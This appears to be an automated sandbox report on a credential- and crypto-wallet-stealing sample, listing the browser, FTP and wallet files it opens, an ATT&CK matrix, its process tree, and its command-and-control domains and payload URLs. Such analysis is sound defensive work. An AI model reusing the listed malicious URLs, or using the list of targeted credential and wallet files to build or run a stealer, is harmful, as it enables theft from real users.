                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Designing.comBinary or memory string: WIN_81
                Source: Designing.comBinary or memory string: WIN_XP
                Source: Brunette.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Designing.comBinary or memory string: WIN_XPe
                Source: Designing.comBinary or memory string: WIN_VISTA
                Source: Designing.comBinary or memory string: WIN_7
                Source: Designing.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: Yara matchFile source: 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E22263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 12_2_00E22263
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E21C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 12_2_00E21C61
MITRE ATT&CK matrix (techniques listed per tactic, with the report's count in parentheses where one is shown):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (21); Native API (1); Command and Scripting Interpreter (2); PowerShell (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (12); RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (11); Valid Accounts (2); Virtualization/Sandbox Evasion (221); Access Token Manipulation (21); Process Injection (12)
Credential Access: OS Credential Dumping (2); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (13); System Information Discovery (37); Security Software Discovery (241); Virtualization/Sandbox Evasion (221); Process Discovery (4); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (41); Input Capture (21); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (11); Non-Application Layer Protocol (4); Application Layer Protocol (115); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1579539 | Sample: Setup.exe | Start date: 22/12/2024 | Architecture: WINDOWS | Score: 100

Start
  ├─ quantitypitt.click
  ├─ qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv
  ├─ 2 other IPs or domains
  ├─ Suricata IDS alerts for network traffic
  ├─ Found malware configuration
  ├─ Multi AV Scanner detection for submitted file
  ├─ 7 other signatures
  └─ Setup.exe 21 (started)
       └─ cmd.exe 2 (started)
            ├─ C:\Users\user\AppData\Local\...\Designing.com, PE32 (dropped)
            ├─ Drops PE files with a suspicious file extension
            ├─ Designing.com (started)
            │    ├─ quantitypitt.click 172.67.186.189, 443, 49760, 49766 CLOUDFLARENETUS United States
            │    ├─ kliptizq.shop 172.67.191.144, 443, 49846 CLOUDFLARENETUS United States
            │    ├─ neqi.shop 194.58.112.174, 443, 49823, 49834 AS-REGRU Russian Federation
            │    ├─ Suspicious powershell command line found
            │    ├─ Query firmware table information (likely to detect VMs)
            │    ├─ Found many strings related to Crypto-Wallets (likely being stolen)
            │    ├─ 5 other signatures
            │    └─ powershell.exe 7 (started)
            │         └─ conhost.exe (started)
            ├─ cmd.exe 2 (started)
            ├─ extrac32.exe 19 (started)
            └─ 8 other processes

Source | Detection | Scanner
Setup.exe | 7% | Virustotal
Setup.exe | 3% | ReversingLabs

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\124531\Designing.com | 0% | ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Reputation
quantitypitt.click | 172.67.186.189 | true | true | unknown
kliptizq.shop | 172.67.191.144 | true | false | high
neqi.shop | 194.58.112.174 | true | false | unknown
qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv | unknown | unknown | false | unknown
Name | Malicious | Reputation
https://quantitypitt.click/api | true | unknown
necklacebudi.lat | false | high
aspecteirs.lat | false | high
sustainskelet.lat | false | high
crosshuaht.lat | false | high
rapeflowwj.lat | false | high
quantitypitt.click | true | unknown
energyaffai.lat | false | high
https://kliptizq.shop/int_clp_ldr_sha.txt | false | unknown
grannyejh.lat | false | high
discokeyus.lat | false | high
Name | Source | Malicious | Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/ | powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/chrome_newtab | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/ac/?q= | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://kliptizq.shop/int_clp_ldr_sha.txtC | Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://kliptizq.shop/int_clp_ldr_sha.txtM | Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://ocsps.ssl.com0 | Setup.exe | false | high
https://www.cloudflare.com/learning/access-management/phishhZ | powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Setup.exe | false | high
https://kliptizq.shop:443/int_clp_ldr_sha.txtge | Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_ | Setup.exe | false | high
https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c | powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp | false | high
https://www.autoitscript.com/autoit3/ | Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | false | high
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Setup.exe | false | high
https://neqi.shop/sdgjyut/psh.txt | Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000002.2789843944.0000000001807000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://quantitypitt.click:443/api | Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://x1.c.lencr.org/0 | Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://x1.i.lencr.org/0 | Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.cloudflare.com/learning/access-management/phish | powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.ssl.com/repository0 | Setup.exe | false | high
https://www.cloudflare.com/5xx-error-landinghZ | powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | false | high
